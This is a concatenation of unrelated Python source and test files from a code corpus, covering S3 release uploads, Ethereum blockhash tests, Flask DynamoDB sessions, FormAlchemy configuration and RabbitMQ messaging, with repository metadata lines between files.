            fileinfo['size'] = 1024
            buildinfo['files']['openmpi-100.0.0rho1.tar.bz2'] = fileinfo
            result['Body'] = StringIO(json.dumps(buildinfo))
            return result

        def list_objects_v2(self, Bucket, Prefix):
            self._readcount += 1
            result = {}
            # report a hit only when the queried prefix is an ancestor of
            # the configured path
            if self._path.startswith(Prefix):
                result['KeyCount'] = 1
            else:
                result['KeyCount'] = 0
            return result

        def upload_file(self, Filename, Bucket, Key):
            assert(Key.startswith(self._path))
            self._file_write_list.append(Key)

        def put_object(self, Bucket, Key, Body):
            assert(Key.startswith(self._path))
            self._file_write_list.append(Key)
            self._stream_write += Body

        def get_readcount(self):
            return self._readcount

        def get_write_list(self):
            return self._file_write_list

        def get_write_stream(self):
            return self._stream_write

    @mock.patch('os.stat', _test_stat)
    @mock.patch('__main__.__compute_hashes', _test_compute_hashes)
    def test_new_buildinfo(self):
        # Fresh release: both files and the build-info json get written.
        releaseinfo = {}
        releaseinfo['project'] = 'open-mpi'
        releaseinfo['branch'] = 'v100.0'
        releaseinfo['version'] = '100.0.0rho1'
        releaseinfo['basename'] = 'openmpi'
        releaseinfo['build_unix_time'] = 12345
        files = ['openmpi-100.0.0rho1.tar.gz', 'openmpi-100.0.0rho1.tar.bz2']
        client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = False)
        upload_files(client, 'open-mpi-scratch', 'scratch',
                     releaseinfo, files, 'NO_OVERWRITE')
        self.assertEqual(client.get_readcount(), 3,
                         "readcount was %d, expected 3" % (client.get_readcount()))
        self.assertEqual(len(client.get_write_list()), 3,
                         "Unexpected write list length: %s" % str(client.get_write_list()))
        buildinfo = json.loads(client.get_write_stream())
        self.assertEqual(len(buildinfo['files']), 2,
                         'Unexpected files length: %s' % str(buildinfo['files']))

    def test_existing_buildinfo_nocontinue(self):
        # ASSUME_NO must abort before any write happens.
        releaseinfo = {}
        releaseinfo['project'] = 'open-mpi'
        releaseinfo['branch'] = 'v100.0'
        releaseinfo['version'] = '100.0.0rho1'
        releaseinfo['basename'] = 'openmpi'
        releaseinfo['build_unix_time'] = 1
        files = ['openmpi-100.0.0rho1.tar.gz']
        client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = True)
        upload_files(client, 'open-mpi-scratch', 'scratch',
                     releaseinfo, files, 'ASSUME_NO')
        self.assertEqual(client.get_readcount(), 3,
                         "readcount was %d, expected 3" % (client.get_readcount()))
        self.assertEqual(len(client.get_write_list()), 0,
                         "Unexpected write list length: %s" % str(client.get_write_list()))

    @mock.patch('os.stat', _test_stat)
    @mock.patch('__main__.__compute_hashes', _test_compute_hashes)
    def test_existing_buildinfo_nooverlap(self):
        # Adding a new file alongside an existing release is allowed under
        # NO_OVERWRITE because no existing file is replaced.
        releaseinfo = {}
        releaseinfo['project'] = 'open-mpi'
        releaseinfo['branch'] = 'v100.0'
        releaseinfo['version'] = '100.0.0rho1'
        releaseinfo['basename'] = 'openmpi'
        releaseinfo['build_unix_time'] = 1
        files = ['openmpi-100.0.0rho1.tar.gz']
        client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = True)
        upload_files(client, 'open-mpi-scratch', 'scratch',
                     releaseinfo, files, 'NO_OVERWRITE')
        self.assertEqual(client.get_readcount(), 3,
                         "readcount was %d, expected 3" % (client.get_readcount()))
        self.assertEqual(len(client.get_write_list()), 2,
                         "Unexpected write list length: %s" % str(client.get_write_list()))
        buildinfo = json.loads(client.get_write_stream())
        self.assertEqual(len(buildinfo['files']), 2,
                         'Unexpected files length: %s' % str(buildinfo['files']))

    @mock.patch('os.stat', _test_stat)
    @mock.patch('__main__.__compute_hashes', _test_compute_hashes)
    def test_existing_buildinfo_overlap_ok(self):
        # NEVER_PROMPT proceeds even when an existing file is overwritten.
        releaseinfo = {}
        releaseinfo['project'] = 'open-mpi'
        releaseinfo['branch'] = 'v100.0'
        releaseinfo['version'] = '100.0.0rho1'
        releaseinfo['basename'] = 'openmpi'
        releaseinfo['build_unix_time'] = 1
        files = ['openmpi-100.0.0rho1.tar.gz', 'openmpi-100.0.0rho1.tar.bz2']
        client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = True)
        upload_files(client, 'open-mpi-scratch', 'scratch',
                     releaseinfo, files, 'NEVER_PROMPT')
        self.assertEqual(client.get_readcount(), 3,
                         "readcount was %d, expected 3" % (client.get_readcount()))
        self.assertEqual(len(client.get_write_list()), 3,
                         "Unexpected write list length: %s" % str(client.get_write_list()))
        buildinfo = json.loads(client.get_write_stream())
        self.assertEqual(len(buildinfo['files']), 2,
                         'Unexpected files length: %s' % str(buildinfo['files']))

    @mock.patch('os.stat', _test_stat)
    @mock.patch('__main__.__compute_hashes', _test_compute_hashes)
    def test_existing_buildinfo_overlap_fail(self):
        # NO_OVERWRITE must abort (no writes) when an overwrite would occur.
        releaseinfo = {}
        releaseinfo['project'] = 'open-mpi'
        releaseinfo['branch'] = 'v100.0'
        releaseinfo['version'] = '100.0.0rho1'
        releaseinfo['basename'] = 'openmpi'
        releaseinfo['build_unix_time'] = 1
        files = ['openmpi-100.0.0rho1.tar.gz', 'openmpi-100.0.0rho1.tar.bz2']
        client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = True)
        upload_files(client, 'open-mpi-scratch', 'scratch',
                     releaseinfo, files, 'NO_OVERWRITE')
        self.assertEqual(client.get_readcount(), 3,
                         "readcount was %d, expected 3" % (client.get_readcount()))
        self.assertEqual(len(client.get_write_list()), 0,
                         "Unexpected write list length: %s" % str(client.get_write_list()))
if __name__ == '__main__':
    # Run this module's unit tests when executed directly.
    unittest.main()
| 2.9375 | 3 |
tests/test_articles.py | Mzazi25/newsApp | 0 | 12769693 | <reponame>Mzazi25/newsApp<gh_stars>0
import unittest
from app.models import Articles
class ArticleSourceTest(unittest.TestCase):
'''
Test Class to test the behavior of the Article Sources
'''
def setUp(self):
'''
setup method that runs before every test
'''
self.new_article = Articles("Mpasho","<NAME>","Sisi ni wale wabaya","www.href.com","www.href.com", "date 25","Welcome")
def test_instance(self):
self.assertTrue(isinstance(self.new_article,Articles))
| 3.171875 | 3 |
eip96/eip_96_test_script.py | kevaundray/research | 1,351 | 12769694 | from ethereum import tester, vm
from ethereum.utils import sha3, encode_int32, safe_ord, encode_hex
from ethereum.state_transition import apply_message
# Build a test chain and deploy the EIP-96 blockhash getter contract.
s = tester.state()
c = s.contract('eip_96_blockhash_getter.se.py')
# Reserved addresses used by this scheme: the blockhash contract and the
# special "system" sender that is allowed to store hashes.
blockhash_addr = b'\x00' * 19 + b'\x10'
system_addr = b'\xff' * 19 + b'\xfe'
# Install the compiled getter code at the reserved blockhash address.
s.state.set_code(blockhash_addr, s.state.get_code(c))
def mk_hash_setting_message(data):
    # Message as sent from the system address to record a block hash.
    return vm.Message(sender=system_addr, to=blockhash_addr, value=0, gas=1000000, data=data)
print("Setting block hashes")
for i in range(1, 1000):
    s.state.block_number = i + 1
    # Record sha3(str(i)) as the hash of block i via a system-sender call.
    o = apply_message(s.state, mk_hash_setting_message(sha3(str(i))))
    if i % 100 == 0:
        print("Set %d" % i)
print("Testing reads")
s.state.block_number = 1000
# At height 1000: hashes for the most recent 256 blocks (>= 744) resolve.
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(999)) == sha3(str(999))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(998)) == sha3(str(998))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(744)) == sha3(str(744))
# Just outside the 256-block window -> zero.
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(743)) == b'\x00' * 32
# The current and future block numbers are unknown -> zero.
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(1000)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(1001)) == b'\x00' * 32
# Older blocks: only multiples of 256 appear to be retained (512 works,
# its neighbors do not).
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(513)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(512)) == sha3(str(512))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(511)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(256)) == sha3(str(256))
print("Tests passed!")
print("EVM code: 0x%s" % encode_hex(s.state.get_code(blockhash_addr)))
| 2.078125 | 2 |
django_docutils/lib/tests/test_utils.py | tony/django-docutils | 10 | 12769695 | from django_docutils.lib.utils import chop_after_docinfo, chop_after_title
def test_chop_after_title():
    """chop_after_title() drops the overlined document title, keeping the body."""
    content = """=============================================
Learn JavaScript for free: The best resources
=============================================
first section
-------------
some content
""".strip()
    result = chop_after_title(content)
    expected = """
first section
-------------
some content""".strip()
    assert result == expected
def test_chop_after_docinfo():
    """chop_after_docinfo() removes the title block and all docinfo fields."""
    before = """
===========
Content ok!
===========
:programming_languages: javascript
:topics: webpack
:Created: 2017-07-30
:Author: tony
more text
first section
-------------
some content
""".strip()
    after = """
more text
first section
-------------
some content
""".strip()
    assert chop_after_docinfo(before) == after

    # test docinfo handles spaces in values
    assert (
        chop_after_docinfo(
            source="""
==============
Document title
==============
-----------------
Document subtitle
-----------------
:Title: Overridden Title
:Subtitle: Overridden Subtitle
Content
-------
hi
""".strip()
        )
        == """
Content
-------
hi""".strip()
    )
| 2.421875 | 2 |
example_config.py | ff781/PFERD | 0 | 12769696 | <reponame>ff781/PFERD
import argparse
from pathlib import Path, PurePath
from PFERD import Pferd
from PFERD.ilias import IliasElementType
from PFERD.transform import (attempt, do, glob, keep, move, move_dir,
optionally, re_move, re_rename)
# Per-course transform pipelines (summer semester 2020). attempt(...) tries
# its rules in order and applies the first matching one; the trailing `keep`
# leaves unmatched files untouched.

tf_ss_2020_numerik = attempt(
    # Flatten "Übungsblätter/N. Übungsblatt/..." into zero-padded sheet PDFs.
    re_move(r"Übungsblätter/(\d+)\. Übungsblatt/.*", "Blätter/Blatt_{1:0>2}.pdf"),
    keep,
)

tf_ss_2020_db = attempt(
    move_dir("Begrüßungsvideo/", "Vorlesung/Videos/"),
    do(
        move_dir("Vorlesungsmaterial/Vorlesungsvideos/", "Vorlesung/Videos/"),
        # Normalize double extensions and strip the "dbs-" filename prefix.
        optionally(re_rename("(.*).m4v.mp4", "{1}.mp4")),
        optionally(re_rename("(?i)dbs-(.+)", "{1}")),
    ),
    move_dir("Vorlesungsmaterial/", "Vorlesung/"),
    keep,
)

tf_ss_2020_rechnernetze = attempt(
    re_move(r"Vorlesungsmaterial/.*/(.+?)\.mp4", "Vorlesung/Videos/{1}.mp4"),
    move_dir("Vorlesungsmaterial/", "Vorlesung/"),
    keep,
)

tf_ss_2020_sicherheit = attempt(
    move_dir("Vorlesungsvideos/", "Vorlesung/Videos/"),
    move_dir("Übungsvideos/", "Übung/Videos/"),
    re_move(r"VL(.*)\.pdf", "Vorlesung/{1}.pdf"),
    re_move(r"Übungsblatt (\d+)\.pdf", "Blätter/Blatt_{1:0>2}.pdf"),
    move("Chiffrat.txt", "Blätter/Blatt_01_Chiffrat.txt"),
    keep,
)

tf_ss_2020_pg = attempt(
    move_dir("Vorlesungsaufzeichnungen/", "Vorlesung/Videos/"),
    move_dir("Vorlesungsmaterial/", "Vorlesung/"),
    re_move(r"Übungen/uebungsblatt(\d+).pdf", "Blätter/Blatt_{1:0>2}.pdf"),
    keep,
)
def df_ss_2020_or1(path: PurePath, _type: IliasElementType) -> bool:
    """Directory filter for OR1: only crawl Tutorium 10 among the tutorials.

    The "Tutorien/" folder itself (plus the one tutorial we attend) is
    entered; any other direct child of "Tutorien/" is skipped; everything
    outside "Tutorien/" is crawled normally.
    """
    wanted = (
        "Tutorien/",
        "Tutorien/Tutorium 10, dienstags 15:45 Uhr/",
    )
    if any(glob(pattern)(path) for pattern in wanted):
        return True
    # Every remaining entry directly below "Tutorien/" is another tutorial.
    return not glob("Tutorien/*")(path)
# OR1 transform: tidy the lecture folders; everything else stays in place.
tf_ss_2020_or1 = attempt(
    move_dir("Vorlesung/Unbeschriebene Folien/", "Vorlesung/Folien/"),
    move_dir("Video zur Organisation/", "Vorlesung/Videos/"),
    keep,
)
def main() -> None:
    """Parse CLI arguments and run the selected (or all) course syncs.

    With no positional arguments every course is synchronized; otherwise
    only the named synchronizers run. Replaces six nearly identical
    if-blocks with one table-driven loop (same order, same arguments).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--test-run", action="store_true")
    parser.add_argument("synchronizers", nargs="*")
    args = parser.parse_args()

    pferd = Pferd(Path(__file__).parent, test_run=args.test_run)
    pferd.enable_logging()

    # synchronizer name -> keyword arguments for Pferd.ilias_kit().
    courses = {
        "numerik": dict(target="Numerik", course_id="1083036",
                        transform=tf_ss_2020_numerik),
        "db": dict(target="DB", course_id="1101554",
                   transform=tf_ss_2020_db),
        "rechnernetze": dict(target="Rechnernetze", course_id="1099996",
                             transform=tf_ss_2020_rechnernetze),
        "sicherheit": dict(target="Sicherheit", course_id="1101980",
                           transform=tf_ss_2020_sicherheit),
        "pg": dict(target="PG", course_id="1106095",
                   transform=tf_ss_2020_pg),
        "or1": dict(target="OR1", course_id="1105941",
                    dir_filter=df_ss_2020_or1,
                    transform=tf_ss_2020_or1),
    }

    for name, kwargs in courses.items():
        if not args.synchronizers or name in args.synchronizers:
            pferd.ilias_kit(cookies="ilias_cookies.txt", **kwargs)

    # Prints a summary listing all new, modified or deleted files
    pferd.print_summary()
if __name__ == "__main__":
main()
| 2.125 | 2 |
warehouse/packaging/models.py | domenkozar/warehouse | 0 | 12769697 | <reponame>domenkozar/warehouse
# Copyright 2013 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals
from collections import namedtuple
from six.moves import urllib_parse
from sqlalchemy.sql import select, func
from warehouse import models
from warehouse.packaging.tables import (
packages, releases, release_files, description_urls, journals,
)
# Lightweight read-only records returned by the Model query methods.
Project = namedtuple("Project", ["name"])
# A release file name paired with its relative download URL (incl. md5 tag).
FileURL = namedtuple("FileURL", ["filename", "url"])
class Model(models.Model):
    """Read-only query layer over the packaging tables.

    Each method opens a short-lived connection from ``self.engine`` and
    returns plain Python values (namedtuples, dicts, lists or scalars).
    """

    def all_projects(self):
        """Return every project as a ``Project`` tuple, case-insensitively sorted."""
        query = select([packages.c.name]).order_by(func.lower(packages.c.name))

        with self.engine.connect() as conn:
            return [Project(r["name"]) for r in conn.execute(query)]

    def get_project(self, name):
        """Look up a project by normalized name ('_' -> '-', lowercased).

        Returns a ``Project`` or implicitly ``None`` when not found.
        """
        query = (
            select([packages.c.name])
            .where(
                packages.c.normalized_name == func.lower(
                    func.regexp_replace(name, "_", "-", "ig"),
                )
            )
        )

        with self.engine.connect() as conn:
            result = conn.execute(query).scalar()

            if result is not None:
                return Project(result)

    def get_hosting_mode(self, name):
        """Return the project's hosting mode string (exact name match)."""
        query = (
            select([packages.c.hosting_mode])
            .where(packages.c.name == name)
        )

        with self.engine.connect() as conn:
            return conn.execute(query).scalar()

    def get_release_urls(self, name):
        """Map each release version to its (home_page, download_url) pair."""
        query = (
            select([
                releases.c.version,
                releases.c.home_page,
                releases.c.download_url,
            ])
            .where(releases.c.name == name)
            .order_by(releases.c.version.desc())
        )

        with self.engine.connect() as conn:
            return {
                r["version"]: (r["home_page"], r["download_url"])
                for r in conn.execute(query)
            }

    def get_external_urls(self, name):
        """Return the distinct, sorted description URLs for a project."""
        query = (
            select([description_urls.c.url], distinct=description_urls.c.url)
            .where(description_urls.c.name == name)
            .order_by(
                description_urls.c.url,
            )
        )

        with self.engine.connect() as conn:
            return [r["url"] for r in conn.execute(query)]

    def get_file_urls(self, name):
        """Return ``FileURL`` tuples with relative download paths and md5 fragment."""
        query = (
            select([
                release_files.c.name,
                release_files.c.filename,
                release_files.c.python_version,
                release_files.c.md5_digest,
            ])
            .where(release_files.c.name == name)
            .order_by(release_files.c.filename.desc())
        )

        with self.engine.connect() as conn:
            results = conn.execute(query)

            return [
                FileURL(
                    filename=r["filename"],
                    url=urllib_parse.urljoin(
                        "/".join([
                            "../../packages",
                            r["python_version"],
                            r["name"][0],
                            r["name"],
                            r["filename"],
                        ]),
                        "#md5={}".format(r["md5_digest"]),
                    ),
                )
                for r in results
            ]

    def get_project_for_filename(self, filename):
        """Return the ``Project`` owning a release file.

        NOTE(review): an unknown filename yields ``Project(None)`` rather
        than ``None`` -- callers must cope with that.
        """
        query = (
            select([release_files.c.name])
            .where(release_files.c.filename == filename)
        )

        with self.engine.connect() as conn:
            return Project(conn.execute(query).scalar())

    def get_filename_md5(self, filename):
        """Return the md5 digest recorded for a filename, or ``None``."""
        query = (
            select([release_files.c.md5_digest])
            .where(release_files.c.filename == filename)
        )

        with self.engine.connect() as conn:
            return conn.execute(query).scalar()

    def get_last_serial(self, name=None):
        """Return the highest journal id, optionally restricted to one project."""
        query = select([func.max(journals.c.id)])

        if name is not None:
            query = query.where(journals.c.name == name)

        with self.engine.connect() as conn:
            return conn.execute(query).scalar()
| 2.125 | 2 |
tests/test_docstrings.py | pquinterome/https-github.com-Radiomics-pyradiomics | 1 | 12769698 | # to run this test, from directory above:
# setenv PYTHONPATH /path/to/pyradiomics/radiomics
# nosetests --nocapture -v tests/test_docstrings.py
import logging
from nose_parameterized import parameterized
import six
from radiomics import getFeatureClasses
from testUtils import custom_name_func
featureClasses = getFeatureClasses()
def setup_module(module):
    """Module-level nose fixture."""
    # runs before anything in this file
    print("")  # this is to get a newline after the dots
    return
class TestDocStrings:
    """Checks every radiomics feature class and feature method is documented."""

    def setup(self):
        # setup before each test method
        print("")  # this is to get a newline after the dots

    @classmethod
    def setup_class(self):
        # called before any methods in this class
        print("")  # this is to get a newline after the dots

    @classmethod
    def teardown_class(self):
        # run after any methods in this class
        print("")  # this is to get a newline after the dots

    def generate_scenarios():
        # Yields one (featureClassName, featureName) pair per feature, after
        # asserting the feature class itself carries a docstring.
        # NOTE: deliberately has no `self`; it is called at class-definition
        # time by the @parameterized.expand decorator below.
        global featureClasses
        for featureClassName, featureClass in six.iteritems(featureClasses):
            logging.info('generate_scenarios %s', featureClassName)
            doc = featureClass.__doc__
            assert(doc is not None)
            featureNames = featureClass.getFeatureNames()
            for f in featureNames:
                yield (featureClassName, f)

    @parameterized.expand(generate_scenarios(), testcase_func_name=custom_name_func)
    def test_class(self, featureClassName, featureName):
        # Every get<Name>FeatureValue method must carry a docstring.
        global featureClasses
        logging.info('%s', featureName)
        features = featureClasses[featureClassName]
        doc = getattr(features, "get%sFeatureValue" % featureName).__doc__
        logging.info('%s', doc)
        assert(doc is not None)
| 2.28125 | 2 |
server/fm_server/device/rabbitmq_messages.py | nstoik/farm_monitor | 1 | 12769699 | """Device RabbitMQ messages module."""
import json
import logging
import time
import pika
from fm_server.settings import get_config
LOGGER = logging.getLogger("fm.device.rabbitmq")
def get_connection(config=None):
    """Create and return a blocking connection to RabbitMQ.

    :param config: optional settings object; falls back to ``get_config()``.
    :rtype: pika.BlockingConnection

    NOTE(review): the previous docstring described an asynchronous
    ``pika.SelectConnection`` with an ``on_connection_open`` callback, but
    this function actually builds a synchronous ``BlockingConnection``.
    """
    LOGGER.info("Connecting to RabbitMQ")
    if not config:
        config = get_config()
    user = config.RABBITMQ_USER
    password = config.RABBITMQ_PASSWORD
    virtual_host = config.RABBITMQ_VHOST
    host = config.RABBITMQ_HOST
    port = config.RABBITMQ_PORT
    creds = pika.PlainCredentials(user, password)
    params = pika.ConnectionParameters(
        host=host, port=port, virtual_host=virtual_host, credentials=creds
    )
    return pika.BlockingConnection(parameters=params)
def send_create_message(destination="all"):
    """Send a create message to 'destination' devices.

    Publishes ``{"command": "create"}`` on the messages exchange with the
    routing key ``<destination>.create`` so devices can bind selectively.
    """
    config = get_config()
    connection = get_connection(config=config)
    channel = connection.channel()

    exchange_name = config.RABBITMQ_MESSAGES_EXCHANGE_NAME
    exchange_type = config.RABBITMQ_MESSAGES_EXCHANGE_TYPE
    channel.exchange_declare(exchange=exchange_name, exchange_type=exchange_type)

    routing_key = destination + ".create"
    message = {"command": "create"}
    channel.basic_publish(
        exchange=exchange_name,
        routing_key=routing_key,
        body=json.dumps(message, ensure_ascii=True),
    )
    LOGGER.debug(f"Sent message with key:{routing_key} to {exchange_name} exchange")
    connection.close()
def get_device_status(device_id):
    """Get the device status from the heartbeat service for a given device_id.

    RPC-style request: publishes on the ``_internal`` routing key with a
    temporary exclusive reply queue, then polls that queue for up to ~5
    seconds. Returns the reported state string, or "disconnected" when no
    reply arrives in time.
    """
    config = get_config()
    connection = get_connection(config=config)
    channel = connection.channel()

    exchange_name = config.RABBITMQ_MESSAGES_EXCHANGE_NAME
    exchange_type = config.RABBITMQ_MESSAGES_EXCHANGE_TYPE
    channel.exchange_declare(exchange=exchange_name, exchange_type=exchange_type)

    # Anonymous, exclusive, auto-deleting queue used only for this reply.
    method_frame = channel.queue_declare(queue="", exclusive=True, auto_delete=True)
    reply_queue = method_frame.method.queue
    properties = pika.BasicProperties(
        content_type="application/json", reply_to=reply_queue
    )
    routing_key = "_internal"
    message = {"command": "device_status", "id": device_id}
    channel.basic_publish(
        exchange=exchange_name,
        routing_key=routing_key,
        body=json.dumps(message, ensure_ascii=True),
        properties=properties,
    )
    LOGGER.info(f"Sent request for {device_id } status to {exchange_name} exchange")

    # basic_get returns (None, None, None) until a message is available.
    attempts = 0
    while attempts < 5:
        # pylint: disable=unused-variable
        method_frame, header_frame, body = channel.basic_get(reply_queue)
        if method_frame:
            connection.close()
            state = str(body, "utf-8")
            LOGGER.info(f"Returned status is {state}")
            return state
        LOGGER.debug("No return message received yet")
        time.sleep(1)
        attempts += 1
    LOGGER.warning("No return message received for device status message request")
    connection.close()
    return "disconnected"
| 2.75 | 3 |
simulasi/lab0.5/pamer-saham/script.py | reiva5/struktur-data-dan-algoritma | 0 | 12769700 | <reponame>reiva5/struktur-data-dan-algoritma<filename>simulasi/lab0.5/pamer-saham/script.py
"""Build tcframe test cases, run the generator, then renumber the produced
tc/*.in and tc/*.out files into tc/input/inputNN.txt and tc/output/outputNN.txt.

The two original copy-pasted renumbering loops are collapsed into one helper.
"""
import sys  # kept: file-level import, may be used when the script grows
import os
import glob


def renumber(extension, dest_dir, prefix):
    """Move every tc/*.<extension> file into *dest_dir* as <prefix>NN.txt.

    The destination directory is recreated from scratch and files are
    numbered from 00 in sorted order, exactly like the original loops.
    """
    os.system("rm -rf %s" % dest_dir)
    os.system("mkdir %s" % dest_dir)
    for cnt, path in enumerate(sorted(glob.glob("tc/*.%s" % extension))):
        newFileName = "%s/%s%02d.txt" % (dest_dir, prefix, cnt)
        os.system("mv %s %s" % (path, newFileName))


os.system("tcframe build")
os.system("./runner")
renumber("in", "tc/input", "input")
renumber("out", "tc/output", "output")
| 2.15625 | 2 |
formalchemy/config.py | pombreda/formalchemy | 2 | 12769701 | # -*- coding: utf-8 -*-
import sys
from formalchemy import templates
__doc__ = """
There is two configuration settings available in a global config object.
- encoding: the global encoding used by FormAlchemy to deal with unicode. Default: utf-8
- engine: A valide :class:`~formalchemy.templates.TemplateEngine`
- date_format: Used to format date fields. Default to %Y-%d-%m
- date_edit_format: Used to retrieve field order. Default to m-d-y
Here is a simple example::
>>> from formalchemy import config
>>> config.encoding = 'iso-8859-1'
>>> config.encoding
'iso-8859-1'
>>> from formalchemy import templates
>>> config.engine = templates.TempitaEngine
There is also a convenience method to set the configuration from a config file::
>>> config.from_config({'formalchemy.encoding':'utf-8',
... 'formalchemy.engine':'mako',
... 'formalchemy.engine.options.input_encoding':'utf-8',
... 'formalchemy.engine.options.output_encoding':'utf-8',
... })
>>> config.from_config({'formalchemy.encoding':'utf-8'})
>>> config.encoding
'utf-8'
>>> isinstance(config.engine, templates.MakoEngine)
True
"""
class Config(object):
    # This object replaces the module in sys.modules (see bottom of file),
    # so it mirrors the module docstring/name/file attributes. Attribute
    # reads fall back to the shared __data dict; writes are stored there.
    __doc__ = __doc__
    __name__ = 'formalchemy.config'
    __file__ = __file__

    # Shared defaults, mutated in place by __setattr__ (singleton behavior).
    __data = dict(
        encoding='utf-8',
        date_format='%Y-%m-%d',
        date_edit_format='m-d-y',
        engine = templates.default_engine,
    )

    def __getattr__(self, attr):
        """Serve unknown attributes from the shared data dict."""
        if attr in self.__data:
            return self.__data[attr]
        else:
            raise AttributeError('Configuration has no attribute %s' % attr)

    def __setattr__(self, attr, value):
        # NOTE(review): due to name mangling the '__set_engine' method below
        # is really '_Config__set_engine', so this getattr never finds it and
        # the validator is dead code. Fixing the lookup would reject the
        # documented pattern of assigning an engine *class*, so the existing
        # behavior is deliberately preserved.
        meth = getattr(self, '__set_%s' % attr, None)
        if callable(meth):
            meth(value)
        else:
            self.__data[attr] = value

    def __set_engine(self, value):
        """Validator for the ``engine`` attribute (currently unreachable, see above)."""
        if isinstance(value, templates.TemplateEngine):
            self.__data['engine'] = value
        else:
            raise ValueError('%s is not a template engine')

    def _get_config(self, config, prefix):
        """Pop and return all ``config`` entries whose key starts with ``prefix``.

        Matching keys are removed from ``config`` and returned with the
        prefix stripped off.
        """
        values = {}
        # Iterate a snapshot: popping from a dict while iterating its live
        # keys() view raises RuntimeError on Python 3.
        config_keys = list(config.keys())
        for k in config_keys:
            if k.startswith(prefix):
                v = config.pop(k)
                k = k[len(prefix):]
                values[k] = v
        return values

    def from_config(self, config, prefix='formalchemy.'):
        """Apply settings from a flat config mapping (e.g. a paste/ini section)."""
        from formalchemy import templates
        # ``prefix`` already ends with a dot; the old '%s.engine.options.'
        # interpolation produced 'formalchemy..engine.options.' (double dot)
        # and silently dropped every engine option.
        engine_config = self._get_config(config, '%sengine.options.' % prefix)
        for k, v in self._get_config(config, prefix).items():
            if k == 'engine':
                engine = templates.__dict__.get('%sEngine' % v.title(), None)
                if engine is not None:
                    v = engine(**engine_config)
                else:
                    raise ValueError('%sEngine does not exist' % v.title())
            self.__setattr__(k, v)

    def __repr__(self):
        return "<module 'formalchemy.config' from '%s' with values %s>" % (self.__file__, self.__data)
sys.modules['formalchemy.config'] = Config()
| 2.421875 | 2 |
tests/test_flask_dynamodb_sessions.py | siran/flask-dynamodb-sessions | 4 | 12769702 | import pytest
import re
from pytest_mock import mocker
import flask
import flask.sessions
from flask_dynamodb_sessions import Session
def test_session_boto_settings(mocker):
    """Intended to verify region/endpoint settings reach boto3.

    NOTE(review): this test patches boto3.client and configures the app but
    never calls Session(app) nor makes any assertion -- it currently
    verifies nothing and should be completed.
    """
    client_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
    app = flask.Flask(__name__)
    app.config.update(
        SESSION_DYNAMODB_REGION='bogus-region',
        SESSION_DYNAMODB_ENDPOINT='http://bogus:1234'
    )
def create_test_app(**kwargs):
    """Build a minimal Flask app wired to the DynamoDB session interface.

    ``kwargs`` become Flask config values. A single /test_route view stores
    one key in the session so that session saving is exercised.
    """
    app = flask.Flask(__name__)
    app.config.update(**kwargs)
    Session(app)

    @app.route('/test_route')
    def test_route():
        flask.session['x'] = 'foo'
        return flask.make_response('', 200)

    return app
def test_save_uses_header(mocker):
    """With USE_HEADER, the session id is returned via X-SessionId, not a cookie."""
    boto_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
    boto_mock_instance = boto_mock()
    app = create_test_app(
        SESSION_DYNAMODB_USE_HEADER=True
    )
    mocker.spy(boto_mock, 'update_item')
    response = app.test_client().get('/test_route')
    # Find the session ID that was passed to update_item()
    session_id = None
    match = re.search("Key={'id': {'S': '(.+?)'}}", str(boto_mock_instance.update_item.call_args))
    if match:
        session_id = match.group(1)
    assert 'X-SessionId' in response.headers
    assert response.headers['X-SessionId'] == session_id
    assert 'Set-Cookie' not in response.headers
def test_read_uses_header(mocker):
    """An incoming X-SessionId header is used as the key for get_item()."""
    expected_session_id = 'foobar'
    boto_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
    boto_mock_instance = boto_mock()
    # Return an empty session payload so the session interface loads cleanly.
    boto_mock_instance.get_item.return_value = {'Item': {'data': ''}}
    app = create_test_app(
        SESSION_DYNAMODB_USE_HEADER=True
    )
    mocker.spy(boto_mock, 'get_item')
    response = app.test_client().get('/test_route', headers={'X-SessionId': expected_session_id})
    # Find the session ID that was passed to get_item()
    actual_session_id = None
    match = re.search("Key={'id': {'S': '(.+?)'}}", str(boto_mock_instance.get_item.call_args))
    if match:
        actual_session_id = match.group(1)
    assert actual_session_id == expected_session_id
def test_consistent_read_default_false(mocker):
    """By default, session reads use eventually-consistent get_item calls."""
    boto_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
    boto_mock_instance = boto_mock()
    boto_mock_instance.get_item.return_value = {'Item': {'data': ''}}
    app = create_test_app(
        SESSION_DYNAMODB_USE_HEADER=True
    )
    mocker.spy(boto_mock, 'get_item')
    response = app.test_client().get('/test_route', headers={'X-SessionId': 'foo'})
    # Validate ConsistentRead setting
    assert 'ConsistentRead=False' in str(boto_mock_instance.get_item.call_args)
def test_consistent_read_true(mocker):
    """SESSION_DYNAMODB_CONSISTENT_READ=True turns on strongly consistent reads."""
    boto_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
    boto_mock_instance = boto_mock()
    boto_mock_instance.get_item.return_value = {'Item': {'data': ''}}
    app = create_test_app(
        SESSION_DYNAMODB_USE_HEADER=True,
        SESSION_DYNAMODB_CONSISTENT_READ=True
    )
    mocker.spy(boto_mock, 'get_item')
